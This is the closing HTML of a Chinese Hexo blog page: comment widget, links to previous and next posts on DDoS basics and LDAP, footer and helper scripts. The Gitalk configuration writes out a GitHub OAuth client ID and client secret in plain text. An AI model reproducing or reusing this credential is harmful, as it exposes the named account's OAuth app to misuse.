            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">如果感觉对您有帮助，请我吃包辣条吧</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    
        <link rel="stylesheet" href="/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: 'd75ec1a5864747376f6f',
        clientSecret: 'b4751152ca815e8e538c64da23e2a371fa1fb2db',
        repo: 'hexo-gitalk',
        owner: 'shuai06',
        admin: "shuai06",
        id: '2020-05-08T11-21-55',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/posts/64661/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/7.jpg" class="responsive-img" alt="DDoS入门学习">
                        
                        <span class="card-title">DDoS入门学习</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
之前以为DDos很简单，现在发现学问还是大滴很呢！！！

理论DDOS简介DDOS(Distributed Denial of Service)，又称分布式拒绝服务攻击。是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击，或者一个攻
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-05-08
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/渗透测试/" class="post-category">
                                    渗透测试
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/渗透测试/">
                        <span class="chip bg-color">渗透测试</span>
                    </a>
                    
                    <a href="/tags/DDos/">
                        <span class="chip bg-color">DDos</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/posts/45429/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="ubuntu server-LDAP">
                        
                        <span class="card-title">ubuntu server-LDAP</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            LDAP
看书前先看目录

理解不同于文件系统的目录(D/d) -&gt; 首字母大写是目录服务，首字母小写的文件系统目录
目录服务是企业网络的核心基础结构
- 如此重要的服务并不被大多数熟悉
- 很少独立使用，与其他服务结合使用
- 微软
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-05-07
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Linux/" class="post-category">
                                    Linux
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Linux/">
                        <span class="chip bg-color">Linux</span>
                    </a>
                    
                    <a href="/tags/ubuntu/">
                        <span class="chip bg-color">ubuntu</span>
                    </a>
                    
                    <a href="/tags/LDAP/">
                        <span class="chip bg-color">LDAP</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: 浮生<br />'
            + '文章作者: 浮生<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('1'),
            headingSelector: 'h2, h3, h4, h6'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4, h6').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="http://www.xpshuai.cn" target="_blank">浮生</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">368.6k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2019";
                    var startMonth = "4";
                    var startDate = "20";
                    var startHour = "15";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
            <span id="icp"><img src="/medias/icp.png" style="vertical-align: text-bottom;" />
                <a href="http://www.beianbeian.com/beianxinxi/816345dfd53e0153acde20c5bb1dd1b0.html" target="_blank">冀ICP备18027796号-1</a>
            </span>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/shuai06" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:2944282625@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2944282625" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2944282625" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/search.xml", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    
        <script src="//code.tidio.co/xfg3rji2iq4povfdtfxiwk4smqduoso6.js"></script>
        <script>
            $(document).ready(function () {
                setInterval(change_Tidio, 50);
                function change_Tidio() {
                    var tidio=$("#tidio-chat iframe");
                    if(tidio.css("display")=="block"&& $(window).width()>977 ){
                        document.getElementById("tidio-chat-iframe").style.bottom= ($("div#backTop.top-scroll").css("display")=="none" &&$(window).width()>977)>0? "-40px" : ($("div.toc-title").length&&$(window).width()>977)>0?"85px":"20px";
                        document.getElementById("tidio-chat-iframe").style.right="-15px";
                        document.getElementById("tidio-chat-iframe").style.height=parseInt(tidio.css("height"))>=520?"520px":tidio.css("height");
                        document.getElementById("tidio-chat-iframe").style.zIndex="997";
                    }
                    else if(tidio.css("display")=="block"&&$(window).width()>601 &&$(window).width()<992 ){
                        document.getElementById("tidio-chat-iframe").style.bottom= ($("div#backTop.top-scroll").css("display")=="none" && 601< $(window).width()<992)>0? "-40px":"20px" ;
                        document.getElementById("tidio-chat-iframe").style.right="-15px";
                        document.getElementById("tidio-chat-iframe").style.zIndex="997";
                    }
                    else if(tidio.css("display")=="block"&&$(window).width()<601 && parseInt(tidio.css("height"))<230){
                        document.getElementById("tidio-chat-iframe").style.bottom= ($("div#backTop.top-scroll").css("display")=="none" && $(window).width()<601)>0? "-10px":"45px" ;
                        document.getElementById("tidio-chat-iframe").style.zIndex="997";
                    }
                    if( tidio.css("display")=="block"&&$(window).width()<601 && parseInt(tidio.css("height"))>=230){
                        document.getElementById("tidio-chat-iframe").style.zIndex="998";
                    }
                }
            });
        </script>
    

    

    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
